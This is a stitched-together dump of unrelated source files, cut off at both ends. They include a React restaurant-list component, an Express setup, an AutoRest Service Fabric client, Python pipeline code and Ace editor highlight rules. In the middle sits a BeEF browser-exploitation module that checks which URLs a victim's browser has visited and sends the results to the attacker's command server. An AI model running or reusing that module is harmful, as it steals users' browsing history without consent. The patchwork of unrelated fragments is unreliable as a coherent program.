restaurantList, tagsCount, loading: false }); } ); } toggleModal = () => { this.props.showModal({ RestaurantFilterModal: !this.props.modals.RestaurantFilterModal, }); }; searchUpdated = (term) => { this.setState({ searchTerm: term }) } tagGenerator = (tags) => { let tagsString = ""; tags.forEach((item, index) => { if ( item === "created" || item === "speed" || item === "rating" || item === "price" ) { tagsString += `&sort_by_${item}=1`; } else if (item === "deliveryBy" || item === "hasDiscount") { tagsString += `&${item}=1`; } else { tagsString += `&tag[${index}]=${item}`; } }); return tagsString; } onFilterValidation = (value) => { const { cityId, mapCenter } = this.state; if (value) { this.setState({ filterValidation: true }, () => { this.fetchRestauranList(cityId, mapCenter); this.toggleModal(); }) } else { this.setState({ filterValidation: false, filters: [] }, () => { this.fetchRestauranList(cityId, mapCenter); this.toggleModal(); }) } } handleFilterSelect = (event) => { let filter_list = this.state.filters; let check = event.target.checked; let checked_filter = event.target.value; let check_type = event.target.type; if (check) { if (check_type !== "radio") { this.setState({ filters: [...this.state.filters, checked_filter] }) } else { let cloneFilters = [...this.state.filters]; cloneFilters.forEach(radio => { if ( radio === "created" || radio === "speed" || radio === "rating" || radio === "price" ) { let index = cloneFilters.indexOf(radio); if (index > -1) { cloneFilters.splice(index, 1); } } }); this.setState({ filters: [...cloneFilters, checked_filter] }) } } else { var index = filter_list.indexOf(checked_filter); if (index > -1) { filter_list.splice(index, 1); this.setState({ filters: filter_list }) } } } deleteFilter = (filter) => { const { cityId, mapCenter } = this.state; console.log(this.state.filters) let filtersClone = [...this.state.filters]; var index = filtersClone.indexOf(filter); if (index > -1) { filtersClone.splice(index, 1); } this.setState({ filters: filtersClone, }, () => { console.log(filtersClone, this.state.filters); this.fetchRestauranList(cityId, mapCenter); }) } render() { const { restaurantList } = this.state; const filteredRestaurant = restaurantList.filter(createFilter(this.state.searchTerm, KEYS_TO_FILTERS)) return ( <div className="lightBg"> <NavigationBar back title="لیست رستورانها" filter toggleModal={this.toggleModal} // like background /> {!this.state.loading && <div className="restaurant-list__search-input bgWhite"> <SearchInput className="location__user-position-search-input center" onChange={this.searchUpdated} placeholder="جستجو ..." /> </div> } {this.state.filters.length > 0 ? <div className="rightP10 leftP10"> {this.state.filters.map((filter, index) => <React.Fragment> {( filter === "deliveryBy" || filter === "hasDiscount" || filter === "created" || filter === "speed" || filter === "rating" || filter === "price" ) ? <div className="chip"> {otherFilter[filter]} <i className="chilivery-close rightP5" onClick={() => this.deleteFilter(filter)} /> </div> : null } {this.state.concatTag.map(tag => <React.Fragment> {parseInt(filter) === tag.id ? ( <div className="chip"> {tag.name} <i className="chilivery-close rightP5" onClick={() => this.deleteFilter(filter)} /> </div> ) : null } </React.Fragment> ) } </React.Fragment> )} </div> : null } <div className="padd15 rtl"> {this.state.loading ? <Loading /> : <React.Fragment> {filteredRestaurant.length == 0 ? <div className="order-empty center" style={{ height: 'calc(100vh - 200px)' }} > <div className="order"> <div className="order-empty__icon bottomP15"> <img className="order-empty__img" src={icon} alt="" /> <span className="order-empty__title">این رستوران در این مکان وجود ندارد</span> </div> </div> </div> : filteredRestaurant.map((item, index) => ( <RestaurantsListItem key={index} {...item} /> )) } </React.Fragment> } </div> {this.state.restaurantList.length > 0 ? <React.Fragment> {/* {Object.keys(this.state.restaurantListTag).length > 0 ? */} <RestaurantFilterModal toggleModal={this.toggleModal} data={this.state.restaurantListTag} onChange={this.handleFilterSelect} onFilterValidation={this.onFilterValidation} filters={this.state.filters} tagsCount={this.state.tagsCount} /> {/* } */} </React.Fragment> : <div className="order-empty center" style={{ height: 'calc(100vh - 200px)' }} > <div className="order"> <div className="order-empty__icon bottomP15"> <img className="order-empty__img" src={icon} alt="" /> <span className="order-empty__title">این رستوران در این مکان وجود ندارد</span> </div> </div> </div> } </div> ); } } const mapStateToProps = state => ({ modals: { RestaurantFilterModal: state.Modals.RestaurantFilterModal, }, userPosition: state.UserPosition.neighborhood }); const mapDispatchToProps = dispatch => ({ showModal: (showStatus) => { dispatch(showModal(showStatus)) }, }); export default connect(mapStateToProps, mapDispatchToProps)(RestaurantsList);
// ------ Add npm modules const express = require('express') const helmet = require('helmet') const cors = require('cors') const { urlencoded, json } = require('body-parser') const app = express() // ------ Initialize & Use Middle-Wares app.set('trust proxy', 1) app.use(urlencoded({ extended: true })) app.use(json()) app.use(helmet()) app.use(cors()) // ------ Add logger to system const logger = require('./services/logger') app.use(logger) // ------ Require all routes const router = require('./routes') app.use('/api', router) // ------ Add Response Decorator (& error handler) to system const decorator = require('./services/response_decorator') app.use(decorator) module.exports = app
class Error(Exception): pass class AuthError(Error): pass class RepoNotFoundError(Error): pass class UninitializedBuildError(Error): pass
/* * Code generated by Microsoft (R) AutoRest Code Generator 0.16.0.0 * Changes may cause incorrect behavior and will be lost if the code is * regenerated. */ 'use strict'; var util = require('util'); var msRest = require('ms-rest'); var WebResource = msRest.WebResource; /** * @class * ServiceGroupFromTemplates * __NOTE__: An instance of this class is automatically created for an * instance of the ServiceFabricClient. * Initializes a new instance of the ServiceGroupFromTemplates class. * @constructor * * @param {ServiceFabricClient} client Reference to the service client. */ function ServiceGroupFromTemplates(client) { this.client = client; } /** * Create service group from templates * * @param {string} applicationName The name of the application * * @param {object} serviceDescriptionTemplate The template of the service * description * * @param {string} [serviceDescriptionTemplate.serviceName] * * @param {string} [serviceDescriptionTemplate.serviceTypeName] * * @param {object} [options] Optional Parameters. * * @param {object} [options.customHeaders] Headers that will be added to the * request * * @param {function} callback * * @returns {function} callback(err, result, request, response) * * {Error} err - The Error object if an error occurred, null otherwise. * * {object} [result] - The deserialized result object. * * {object} [request] - The HTTP Request object if an error did not occur. * * {stream} [response] - The HTTP Response stream if an error did not occur. */ ServiceGroupFromTemplates.prototype.create = function (applicationName, serviceDescriptionTemplate, options, callback) { var client = this.client; if(!callback && typeof options === 'function') { callback = options; options = null; } if (!callback) { throw new Error('callback cannot be null.'); } // Validate try { if (applicationName === null || applicationName === undefined || typeof applicationName.valueOf() !== 'string') { throw new Error('applicationName cannot be null or undefined and it must be of type string.'); } if (serviceDescriptionTemplate === null || serviceDescriptionTemplate === undefined) { throw new Error('serviceDescriptionTemplate cannot be null or undefined.'); } if (this.client.apiVersion === null || this.client.apiVersion === undefined || typeof this.client.apiVersion.valueOf() !== 'string') { throw new Error('this.client.apiVersion cannot be null or undefined and it must be of type string.'); } } catch (error) { return callback(error); } // Construct URL var requestUrl = this.client.baseUri + '//Applications/{applicationName}/$/GetServiceGroups/$/CreateServiceGroupFromTemplate'; requestUrl = requestUrl.replace('{applicationName}', applicationName); var queryParameters = []; queryParameters.push('api-version=' + encodeURIComponent(this.client.apiVersion)); if (queryParameters.length > 0) { requestUrl += '?' + queryParameters.join('&'); } // trim all duplicate forward slashes in the url var regex = /([^:]\/)\/+/gi; requestUrl = requestUrl.replace(regex, '$1'); // Create HTTP transport objects var httpRequest = new WebResource(); httpRequest.method = 'POST'; httpRequest.headers = {}; httpRequest.url = requestUrl; // Set Headers if(options) { for(var headerName in options['customHeaders']) { if (options['customHeaders'].hasOwnProperty(headerName)) { httpRequest.headers[headerName] = options['customHeaders'][headerName]; } } } httpRequest.headers['Content-Type'] = 'application/json; charset=utf-8'; // Serialize Request var requestContent = null; var requestModel = null; try { if (serviceDescriptionTemplate !== null && serviceDescriptionTemplate !== undefined) { var requestModelMapper = new client.models['ServiceDescriptionTemplate']().mapper(); requestModel = client.serialize(requestModelMapper, serviceDescriptionTemplate, 'serviceDescriptionTemplate'); requestContent = JSON.stringify(requestModel); } } catch (error) { var serializationError = new Error(util.format('Error "%s" occurred in serializing the ' + 'payload - "%s"', error.message, util.inspect(serviceDescriptionTemplate, {depth: null}))); return callback(serializationError); } httpRequest.body = requestContent; // Send Request return client.pipeline(httpRequest, function (err, response, responseBody) { if (err) { return callback(err); } var statusCode = response.statusCode; if (statusCode !== 200 && statusCode !== 201 && statusCode !== 202) { var error = new Error(responseBody); error.statusCode = response.statusCode; error.request = msRest.stripRequest(httpRequest); error.response = msRest.stripResponse(response); if (responseBody === '') responseBody = null; var parsedErrorResponse; try { parsedErrorResponse = JSON.parse(responseBody); if (parsedErrorResponse) { if (parsedErrorResponse.error) parsedErrorResponse = parsedErrorResponse.error; if (parsedErrorResponse.code) error.code = parsedErrorResponse.code; if (parsedErrorResponse.message) error.message = parsedErrorResponse.message; } if (parsedErrorResponse !== null && parsedErrorResponse !== undefined) { var resultMapper = new client.models['ErrorModel']().mapper(); error.body = client.deserialize(resultMapper, parsedErrorResponse, 'error.body'); } } catch (defaultError) { error.message = util.format('Error "%s" occurred in deserializing the responseBody ' + '- "%s" for the default response.', defaultError.message, responseBody); return callback(error); } return callback(error); } // Create Result var result = null; if (responseBody === '') responseBody = null; // Deserialize Response if (statusCode === 200) { var parsedResponse = null; try { parsedResponse = JSON.parse(responseBody); result = JSON.parse(responseBody); if (parsedResponse !== null && parsedResponse !== undefined) { var resultMapper = { required: false, serializedName: 'parsedResponse', type: { name: 'String' } }; result = client.deserialize(resultMapper, parsedResponse, 'result'); } } catch (error) { var deserializationError = new Error(util.format('Error "%s" occurred in deserializing the responseBody - "%s"', error, responseBody)); deserializationError.request = msRest.stripRequest(httpRequest); deserializationError.response = msRest.stripResponse(response); return callback(deserializationError); } } // Deserialize Response if (statusCode === 201) { var parsedResponse = null; try { parsedResponse = JSON.parse(responseBody); result = JSON.parse(responseBody); if (parsedResponse !== null && parsedResponse !== undefined) { var resultMapper = { required: false, serializedName: 'parsedResponse', type: { name: 'String' } }; result = client.deserialize(resultMapper, parsedResponse, 'result'); } } catch (error) { var deserializationError1 = new Error(util.format('Error "%s" occurred in deserializing the responseBody - "%s"', error, responseBody)); deserializationError1.request = msRest.stripRequest(httpRequest); deserializationError1.response = msRest.stripResponse(response); return callback(deserializationError1); } } // Deserialize Response if (statusCode === 202) { var parsedResponse = null; try { parsedResponse = JSON.parse(responseBody); result = JSON.parse(responseBody); if (parsedResponse !== null && parsedResponse !== undefined) { var resultMapper = { required: false, serializedName: 'parsedResponse', type: { name: 'String' } }; result = client.deserialize(resultMapper, parsedResponse, 'result'); } } catch (error) { var deserializationError2 = new Error(util.format('Error "%s" occurred in deserializing the responseBody - "%s"', error, responseBody)); deserializationError2.request = msRest.stripRequest(httpRequest); deserializationError2.response = msRest.stripResponse(response); return callback(deserializationError2); } } return callback(null, result, httpRequest, response); }); }; module.exports = ServiceGroupFromTemplates;
from src.io.ReadingContext import ReadingContext from sklearn.pipeline import Pipeline from src.transformers.MinMaxPrinterTransformer import MinMaxPrinterTransformer from src.transformers.OrderingTransformer import OrderingTransformer from src.transformers.RearrangeTransformer import RearrangeTransformer from src.globals import top_idi from src.globals import top_type from src.models.pooling.Model_opts import * class Postprocessing(): def __init__(self, opts: dict, sims, tops): self.opts = opts self.sims = sims self.tops = tops def fit(self): assert opt_model in self.opts assert opt_subm_imgs_per_day in self.opts[opt_model] self.sort_pipe = Pipeline([ #("print_min_max", MinMaxPrinterTransformer()), ("sort", OrderingTransformer(reverse=True)), ]) self.recall_pipe = Pipeline([ ("rearrange", RearrangeTransformer(self.opts[opt_model][opt_subm_imgs_per_day])), ]) def process(self): optimize_only_recall = self.opts[opt_model][opt_subm_imgs_per_day_only_on_recall] subm = { } for i, top in enumerate(self.tops): is_recall_type = top[top_type] == "recall" top_sims = self.sims[i] top_subm = self.sort_pipe.transform(top_sims) if (optimize_only_recall and is_recall_type) or (not optimize_only_recall): top_subm = self.recall_pipe.transform(top_subm) top_id = self.tops[i][top_idi] subm[top_id] = top_subm return subm
// // Copyright (c) 2006-2019 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var results = beef.browser.hasVisited("<%== format_multiline(@urls) %>"); var comp = ''; for (var i=0; i < results.length; i++) { comp += results[i].url+' = '+results[i].visited+' '; } beef.net.send("<%= @command_url %>", <%= @command_id %>, comp); });
import UIElement, { EVENT } from "../../../util/UIElement"; import { BIND } from "../../../util/Event"; import LanguageSelector from "../status-bar-items/LanguageSelector"; import ThemeSwitcher from "../status-bar-items/ThemeSwitcher"; export default class StatusBar extends UIElement { components() { return { LanguageSelector, ThemeSwitcher, } } template () { return /*html*/` <div class='status-bar'> <div class='message-view' ref='$msg'></div> <div class='tool-view' ref='$tool'> <ThemeSwitcher /> <LanguageSelector /> </div> </div> ` } initState() { return { msg: '' } } [BIND('$msg')] () { return { text: this.state.msg } } [EVENT('addStatusBarMessage')] (msg) { this.setState({ msg }) } }
ApiHandler = function (url) { var self = this; self.url = url; function apiRequest (route) { var request = d3.xhr(self.url+"/"+route); request.header('Content-Type', 'application/json'); return request; } this.offersExercised = function (params, load, error) { var request = apiRequest("offersExercised"); request.post(JSON.stringify(params)) .on('load', function(xhr){ var response = JSON.parse(xhr.response), data = []; if (response.length>1) { if (params.reduce===false) { response.shift(); //remove header row data = response.map(function(d) { return { time : moment.utc(d[0]), price : d[1], amount : d[2], amount2 : d[3], tx : d[4], id : d[5], type : '' } }); var prev = null; for (var i=data.length; i>-1; i--) { if (prev && prev.price>data[i].price) data[i].type = 'bid'; else if (prev && prev.price<data[i].price) data[i].type = 'ask'; //else if (prev) data[i].type = prev.type; prev = data[i]; } } else { response.splice(0,1); //remove first //remove null row, if we get one if (response.length==1 && !response[0][1]) response.shift(); data = response.map(function(d) { return { startTime : moment.utc(d[0]), baseVolume : d[1], counterVolume : d[2], count : d[3], open : d[4], high : d[5], low : d[6], close : d[7], vwap : d[8], openTime : d[9], closeTime : d[10], partial : d[11] }; }); } } load(data); }) .on('error', function(xhr){ if (error) error({status:xhr.status,text:xhr.statusText,message:xhr.response}) }); return request; } this.valueSent = function (params, load, error) { var request = apiRequest("valueSent"); return handleRequest(request, params, function (err, response){ if (err) error(err); else load(response); }); } this.issuerCapitalization = function (params, load, error) { var request = apiRequest("issuerCapitalization"); return handleRequest(request, params, function (err, response){ if (err) error(err); else load(response); }); } this.getTotalAccounts = function(time, callback){ var request = apiRequest("accountsCreated"); time = time || new Date(); request.post(JSON.stringify({ startTime : time, endTime : d3.time.year.offset(time, -10), timeIncrement : "all" })).on('load', function(xhr){ data = JSON.parse(xhr.response); num = data[1] && data[1][1] ? data[1][1] : 0; callback (null, num); }).on('error', function(xhr){ callback({status:xhr.status,text:xhr.statusText,message:xhr.response}); }); return request; } this.accountsCreated = function (params, callback) { var request = apiRequest("accountsCreated"); return handleRequest(request, params, callback); } this.getTopMarkets = function (ex, callback) { var request = apiRequest("topMarkets"); return handleRequest(request, { exchange : ex }, callback); } this.getVolume24Hours = function (ex, callback) { var request = apiRequest("totalValueSent"); return handleRequest(request, { exchange : ex }, callback); } this.getVolume30Days = function (ex, callback) { var request = apiRequest("totalValueSent"); return handleRequest(request, { endTime : moment.utc(), startTime : moment.utc().subtract(30, "days"), exchange : ex }, callback); } this.getNetworkValue = function (ex, callback) { var request = apiRequest("totalNetworkValue"); return handleRequest(request, { exchange : ex }, callback); } this.exchangeRates = function (params, callback) { var request = apiRequest("exchangeRates"); return handleRequest(request, params, callback); } this.marketTraders = function (params, callback) { var request = apiRequest("marketTraders"); return handleRequest(request, params, callback); } function handleRequest(request, params, callback) { request.post(JSON.stringify(params)) .on('load', function(xhr){ var response = JSON.parse(xhr.response); callback (null, response); }).on('error', function(xhr){ callback({status:xhr.status,text:xhr.statusText,message:xhr.response}); }); return request; } }
define("ace/mode/doc_comment_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"], function(require, exports, module) { "use strict"; var oop = require("../lib/oop"); var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules; var DocCommentHighlightRules = function() { this.$rules = { "start" : [ { token : "comment.doc.tag", regex : "@[\\w\\d_]+" // TODO: fix email addresses }, DocCommentHighlightRules.getTagRule(), { defaultToken : "comment.doc", caseInsensitive: true }] }; }; oop.inherits(DocCommentHighlightRules, TextHighlightRules); DocCommentHighlightRules.getTagRule = function(start) { return { token : "comment.doc.tag.storage.type", regex : "\\b(?:TODO|FIXME|XXX|HACK)\\b" }; }; DocCommentHighlightRules.getStartRule = function(start) { return { token : "comment.doc", // doc comment regex : "\\/\\*(?=\\*)", next : start }; }; DocCommentHighlightRules.getEndRule = function (start) { return { token : "comment.doc", // closing comment regex : "\\*\\/", next : start }; }; exports.DocCommentHighlightRules = DocCommentHighlightRules; }); define("ace/mode/javascript_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/doc_comment_highlight_rules","ace/mode/text_highlight_rules"], function(require, exports, module) { "use strict"; var oop = require("../lib/oop"); var DocCommentHighlightRules = require("./doc_comment_highlight_rules").DocCommentHighlightRules; var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules; var identifierRe = "[a-zA-Z\\$_\u00a1-\uffff][a-zA-Z\\d\\$_\u00a1-\uffff]*"; var JavaScriptHighlightRules = function(options) { var keywordMapper = this.createKeywordMapper({ "variable.language": "Array|Boolean|Date|Function|Iterator|Number|Object|RegExp|String|Proxy|" + // Constructors "Namespace|QName|XML|XMLList|" + // E4X "ArrayBuffer|Float32Array|Float64Array|Int16Array|Int32Array|Int8Array|" + "Uint16Array|Uint32Array|Uint8Array|Uint8ClampedArray|" + "Error|EvalError|InternalError|RangeError|ReferenceError|StopIteration|" + // Errors "SyntaxError|TypeError|URIError|" + "decodeURI|decodeURIComponent|encodeURI|encodeURIComponent|eval|isFinite|" + // Non-constructor functions "isNaN|parseFloat|parseInt|" + "JSON|Math|" + // Other "this|arguments|prototype|window|document" , // Pseudo "keyword": "const|yield|import|get|set|async|await|" + "break|case|catch|continue|default|delete|do|else|finally|for|function|" + "if|in|of|instanceof|new|return|switch|throw|try|typeof|let|var|while|with|debugger|" + "__parent__|__count__|escape|unescape|with|__proto__|" + "class|enum|extends|super|export|implements|private|public|interface|package|protected|static", "storage.type": "const|let|var|function", "constant.language": "null|Infinity|NaN|undefined", "support.function": "alert", "constant.language.boolean": "true|false" }, "identifier"); var kwBeforeRe = "case|do|else|finally|in|instanceof|return|throw|try|typeof|yield|void"; var escapedRe = "\\\\(?:x[0-9a-fA-F]{2}|" + // hex "u[0-9a-fA-F]{4}|" + // unicode "u{[0-9a-fA-F]{1,6}}|" + // es6 unicode "[0-2][0-7]{0,2}|" + // oct "3[0-7][0-7]?|" + // oct "[4-7][0-7]?|" + //oct ".)"; this.$rules = { "no_regex" : [ DocCommentHighlightRules.getStartRule("doc-start"), comments("no_regex"), { token : "string", regex : "'(?=.)", next : "qstring" }, { token : "string", regex : '"(?=.)', next : "qqstring" }, { token : "constant.numeric", // hexadecimal, octal and binary regex : /0(?:[xX][0-9a-fA-F]+|[oO][0-7]+|[bB][01]+)\b/ }, { token : "constant.numeric", // decimal integers and floats regex : /(?:\d\d*(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+\b)?/ }, { token : [ "storage.type", "punctuation.operator", "support.function", "punctuation.operator", "entity.name.function", "text","keyword.operator" ], regex : "(" + identifierRe + ")(\\.)(prototype)(\\.)(" + identifierRe +")(\\s*)(=)", next: "function_arguments" }, { token : [ "storage.type", "punctuation.operator", "entity.name.function", "text", "keyword.operator", "text", "storage.type", "text", "paren.lparen" ], regex : "(" + identifierRe + ")(\\.)(" + identifierRe +")(\\s*)(=)(\\s*)(function)(\\s*)(\\()", next: "function_arguments" }, { token : [ "entity.name.function", "text", "keyword.operator", "text", "storage.type", "text", "paren.lparen" ], regex : "(" + identifierRe +")(\\s*)(=)(\\s*)(function)(\\s*)(\\()", next: "function_arguments" }, { token : [ "storage.type", "punctuation.operator", "entity.name.function", "text", "keyword.operator", "text", "storage.type", "text", "entity.name.function", "text", "paren.lparen" ], regex : "(" + identifierRe + ")(\\.)(" + identifierRe +")(\\s*)(=)(\\s*)(function)(\\s+)(\\w+)(\\s*)(\\()", next: "function_arguments" }, { token : [ "storage.type", "text", "entity.name.function", "text", "paren.lparen" ], regex : "(function)(\\s+)(" + identifierRe + ")(\\s*)(\\()", next: "function_arguments" }, { token : [ "entity.name.function", "text", "punctuation.operator", "text", "storage.type", "text", "paren.lparen" ], regex : "(" + identifierRe + ")(\\s*)(:)(\\s*)(function)(\\s*)(\\()", next: "function_arguments" }, { token : [ "text", "text", "storage.type", "text", "paren.lparen" ], regex : "(:)(\\s*)(function)(\\s*)(\\()", next: "function_arguments" }, { token : "keyword", regex : "from(?=\\s*('|\"))" }, { token : "keyword", regex : "(?:" + kwBeforeRe + ")\\b", next : "start" }, { token : ["support.constant"], regex : /that\b/ }, { token : ["storage.type", "punctuation.operator", "support.function.firebug"], regex : /(console)(\.)(warn|info|log|error|time|trace|timeEnd|assert)\b/ }, { token : keywordMapper, regex : identifierRe }, { token : "punctuation.operator", regex : /[.](?![.])/, next : "property" }, { token : "storage.type", regex : /=>/, next : "start" }, { token : "keyword.operator", regex : /--|\+\+|\.{3}|===|==|=|!=|!==|<+=?|>+=?|!|&&|\|\||\?:|[!$%&*+\-~\/^]=?/, next : "start" }, { token : "punctuation.operator", regex : /[?:,;.]/, next : "start" }, { token : "paren.lparen", regex : /[\[({]/, next : "start" }, { token : "paren.rparen", regex : /[\])}]/ }, { token: "comment", regex: /^#!.*$/ } ], property: [{ token : "text", regex : "\\s+" }, { token : [ "storage.type", "punctuation.operator", "entity.name.function", "text", "keyword.operator", "text", "storage.type", "text", "entity.name.function", "text", "paren.lparen" ], regex : "(" + identifierRe + ")(\\.)(" + identifierRe +")(\\s*)(=)(\\s*)(function)(?:(\\s+)(\\w+))?(\\s*)(\\()", next: "function_arguments" }, { token : "punctuation.operator", regex : /[.](?![.])/ }, { token : "support.function", regex : /(s(?:h(?:ift|ow(?:Mod(?:elessDialog|alDialog)|Help))|croll(?:X|By(?:Pages|Lines)?|Y|To)?|t(?:op|rike)|i(?:n|zeToContent|debar|gnText)|ort|u(?:p|b(?:str(?:ing)?)?)|pli(?:ce|t)|e(?:nd|t(?:Re(?:sizable|questHeader)|M(?:i(?:nutes|lliseconds)|onth)|Seconds|Ho(?:tKeys|urs)|Year|Cursor|Time(?:out)?|Interval|ZOptions|Date|UTC(?:M(?:i(?:nutes|lliseconds)|onth)|Seconds|Hours|Date|FullYear)|FullYear|Active)|arch)|qrt|lice|avePreferences|mall)|h(?:ome|andleEvent)|navigate|c(?:har(?:CodeAt|At)|o(?:s|n(?:cat|textual|firm)|mpile)|eil|lear(?:Timeout|Interval)?|a(?:ptureEvents|ll)|reate(?:StyleSheet|Popup|EventObject))|t(?:o(?:GMTString|S(?:tring|ource)|U(?:TCString|pperCase)|Lo(?:caleString|werCase))|est|a(?:n|int(?:Enabled)?))|i(?:s(?:NaN|Finite)|ndexOf|talics)|d(?:isableExternalCapture|ump|etachEvent)|u(?:n(?:shift|taint|escape|watch)|pdateCommands)|j(?:oin|avaEnabled)|p(?:o(?:p|w)|ush|lugins.refresh|a(?:ddings|rse(?:Int|Float)?)|r(?:int|ompt|eference))|e(?:scape|nableExternalCapture|val|lementFromPoint|x(?:p|ec(?:Script|Command)?))|valueOf|UTC|queryCommand(?:State|Indeterm|Enabled|Value)|f(?:i(?:nd|le(?:ModifiedDate|Size|CreatedDate|UpdatedDate)|xed)|o(?:nt(?:size|color)|rward)|loor|romCharCode)|watch|l(?:ink|o(?:ad|g)|astIndexOf)|a(?:sin|nchor|cos|t(?:tachEvent|ob|an(?:2)?)|pply|lert|b(?:s|ort))|r(?:ou(?:nd|teEvents)|e(?:size(?:By|To)|calc|turnValue|place|verse|l(?:oad|ease(?:Capture|Events)))|andom)|g(?:o|et(?:ResponseHeader|M(?:i(?:nutes|lliseconds)|onth)|Se(?:conds|lection)|Hours|Year|Time(?:zoneOffset)?|Da(?:y|te)|UTC(?:M(?:i(?:nutes|lliseconds)|onth)|Seconds|Hours|Da(?:y|te)|FullYear)|FullYear|A(?:ttention|llResponseHeaders)))|m(?:in|ove(?:B(?:y|elow)|To(?:Absolute)?|Above)|ergeAttributes|a(?:tch|rgins|x))|b(?:toa|ig|o(?:ld|rderWidths)|link|ack))\b(?=\()/ }, { token : "support.function.dom", regex : /(s(?:ub(?:stringData|mit)|plitText|e(?:t(?:NamedItem|Attribute(?:Node)?)|lect))|has(?:ChildNodes|Feature)|namedItem|c(?:l(?:ick|o(?:se|neNode))|reate(?:C(?:omment|DATASection|aption)|T(?:Head|extNode|Foot)|DocumentFragment|ProcessingInstruction|E(?:ntityReference|lement)|Attribute))|tabIndex|i(?:nsert(?:Row|Before|Cell|Data)|tem)|open|delete(?:Row|C(?:ell|aption)|T(?:Head|Foot)|Data)|focus|write(?:ln)?|a(?:dd|ppend(?:Child|Data))|re(?:set|place(?:Child|Data)|move(?:NamedItem|Child|Attribute(?:Node)?)?)|get(?:NamedItem|Element(?:sBy(?:Name|TagName|ClassName)|ById)|Attribute(?:Node)?)|blur)\b(?=\()/ }, { token : "support.constant", regex : /(s(?:ystemLanguage|cr(?:ipts|ollbars|een(?:X|Y|Top|Left))|t(?:yle(?:Sheets)?|atus(?:Text|bar)?)|ibling(?:Below|Above)|ource|uffixes|e(?:curity(?:Policy)?|l(?:ection|f)))|h(?:istory|ost(?:name)?|as(?:h|Focus))|y|X(?:MLDocument|SLDocument)|n(?:ext|ame(?:space(?:s|URI)|Prop))|M(?:IN_VALUE|AX_VALUE)|c(?:haracterSet|o(?:n(?:structor|trollers)|okieEnabled|lorDepth|mp(?:onents|lete))|urrent|puClass|l(?:i(?:p(?:boardData)?|entInformation)|osed|asses)|alle(?:e|r)|rypto)|t(?:o(?:olbar|p)|ext(?:Transform|Indent|Decoration|Align)|ags)|SQRT(?:1_2|2)|i(?:n(?:ner(?:Height|Width)|put)|ds|gnoreCase)|zIndex|o(?:scpu|n(?:readystatechange|Line)|uter(?:Height|Width)|p(?:sProfile|ener)|ffscreenBuffering)|NEGATIVE_INFINITY|d(?:i(?:splay|alog(?:Height|Top|Width|Left|Arguments)|rectories)|e(?:scription|fault(?:Status|Ch(?:ecked|arset)|View)))|u(?:ser(?:Profile|Language|Agent)|n(?:iqueID|defined)|pdateInterval)|_content|p(?:ixelDepth|ort|ersonalbar|kcs11|l(?:ugins|atform)|a(?:thname|dding(?:Right|Bottom|Top|Left)|rent(?:Window|Layer)?|ge(?:X(?:Offset)?|Y(?:Offset)?))|r(?:o(?:to(?:col|type)|duct(?:Sub)?|mpter)|e(?:vious|fix)))|e(?:n(?:coding|abledPlugin)|x(?:ternal|pando)|mbeds)|v(?:isibility|endor(?:Sub)?|Linkcolor)|URLUnencoded|P(?:I|OSITIVE_INFINITY)|f(?:ilename|o(?:nt(?:Size|Family|Weight)|rmName)|rame(?:s|Element)|gColor)|E|whiteSpace|l(?:i(?:stStyleType|n(?:eHeight|kColor))|o(?:ca(?:tion(?:bar)?|lName)|wsrc)|e(?:ngth|ft(?:Context)?)|a(?:st(?:M(?:odified|atch)|Index|Paren)|yer(?:s|X)|nguage))|a(?:pp(?:MinorVersion|Name|Co(?:deName|re)|Version)|vail(?:Height|Top|Width|Left)|ll|r(?:ity|guments)|Linkcolor|bove)|r(?:ight(?:Context)?|e(?:sponse(?:XML|Text)|adyState))|global|x|m(?:imeTypes|ultiline|enubar|argin(?:Right|Bottom|Top|Left))|L(?:N(?:10|2)|OG(?:10E|2E))|b(?:o(?:ttom|rder(?:Width|RightWidth|BottomWidth|Style|Color|TopWidth|LeftWidth))|ufferDepth|elow|ackground(?:Color|Image)))\b/ }, { token : "identifier", regex : identifierRe }, { regex: "", token: "empty", next: "no_regex" } ], "start": [ DocCommentHighlightRules.getStartRule("doc-start"), comments("start"), { token: "string.regexp", regex: "\\/", next: "regex" }, { token : "text", regex : "\\s+|^$", next : "start" }, { token: "empty", regex: "", next: "no_regex" } ], "regex": [ { token: "regexp.keyword.operator", regex: "\\\\(?:u[\\da-fA-F]{4}|x[\\da-fA-F]{2}|.)" }, { token: "string.regexp", regex: "/[sxngimy]*", next: "no_regex" }, { token : "invalid", regex: /\{\d+\b,?\d*\}[+*]|[+*$^?][+*]|[$^][?]|\?{3,}/ }, { token : "constant.language.escape", regex: /\(\?[:=!]|\)|\{\d+\b,?\d*\}|[+*]\?|[()$^+*?.]/ }, { token : "constant.language.delimiter", regex: /\|/ }, { token: "constant.language.escape", regex: /\[\^?/, next: "regex_character_class" }, { token: "empty", regex: "$", next: "no_regex" }, { defaultToken: "string.regexp" } ], "regex_character_class": [ { token: "regexp.charclass.keyword.operator", regex: "\\\\(?:u[\\da-fA-F]{4}|x[\\da-fA-F]{2}|.)" }, { token: "constant.language.escape", regex: "]", next: "regex" }, { token: "constant.language.escape", regex: "-" }, { token: "empty", regex: "$", next: "no_regex" }, { defaultToken: "string.regexp.charachterclass" } ], "function_arguments": [ { token: "variable.parameter", regex: identifierRe }, { token: "punctuation.operator", regex: "[, ]+" }, { token: "punctuation.operator", regex: "$" }, { token: "empty", regex: "", next: "no_regex" } ], "qqstring" : [ { token : "constant.language.escape", regex : escapedRe }, { token : "string", regex : "\\\\$", consumeLineEnd : true }, { token : "string", regex : '"|$', next : "no_regex" }, { defaultToken: "string" } ], "qstring" : [ { token : "constant.language.escape", regex : escapedRe }, { token : "string", regex : "\\\\$", consumeLineEnd : true }, { token : "string", regex : "'|$", next : "no_regex" }, { defaultToken: "string" } ] }; if (!options || !options.noES6) { this.$rules.no_regex.unshift({ regex: "[{}]", onMatch: function(val, state, stack) { this.next = val == "{" ? this.nextState : ""; if (val == "{" && stack.length) { stack.unshift("start", state); } else if (val == "}" && stack.length) { stack.shift(); this.next = stack.shift(); if (this.next.indexOf("string") != -1 || this.next.indexOf("jsx") != -1) return "paren.quasi.end"; } return val == "{" ? "paren.lparen" : "paren.rparen"; }, nextState: "start" }, { token : "string.quasi.start", regex : /`/, push : [{ token : "constant.language.escape", regex : escapedRe }, { token : 